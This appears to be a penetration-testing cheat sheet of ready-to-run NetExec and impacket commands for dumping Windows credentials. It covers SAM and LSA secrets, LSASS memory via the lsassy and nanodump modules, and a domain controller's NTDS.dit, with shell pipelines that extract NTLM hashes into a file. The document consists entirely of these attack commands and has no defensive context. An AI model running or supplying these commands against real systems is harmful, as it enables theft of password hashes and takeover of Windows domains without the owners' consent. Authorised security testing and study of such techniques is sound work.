### Dump `SAM` - requires Local Admin ```bash nxc smb $IP --local-auth -u $USER -p $PWD --sam nxc smb $IP -u $USER -p $PWD --sam | fgrep -v '[' | awk -F: '{print $4}' | tee -a dumped_hashes.txt ``` ### Dump `LSA` - requires Local Admin ```bash nxc smb $IP --local-auth -u $USER -p $PWD --lsa nxc smb $IP -u $USER -p $PWD --lsa secdump ``` ### Dump `LSASS` - requires Local Admin ```bash nxc smb $IP -u $USER -p $PWD -M lsassy nxc smb $IP -u $USER -p $PWD -M nanodump nxc smb $IP -u $USER -p $PWD -M nanodump | fgrep -v '[' | awk -F: '{print $2}' | tee -a dumped_hashes.txt ``` ### Dump `NTDS.dit` - requires Domain Admin or Local Admin on Domain Controller ```bash nxc smb $IP -u $USER -p $PWD -M ntdsutil | fgrep -v '[' | awk -F: '{print $4}' | tee -a dumped_hashes.txt impacket-secretsdump '$USER':'$PWD'@$IP -just-dc-ntlm -outputfile output.txt ```